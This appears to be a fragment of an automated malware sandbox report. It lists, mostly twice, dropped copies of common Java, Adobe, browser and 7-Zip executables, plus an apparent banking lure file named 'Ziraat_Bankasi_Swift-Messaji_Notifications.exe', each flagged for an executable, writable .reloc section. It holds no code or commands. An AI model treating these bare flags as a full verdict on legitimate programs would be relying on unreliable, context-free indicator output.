Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: niellist.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
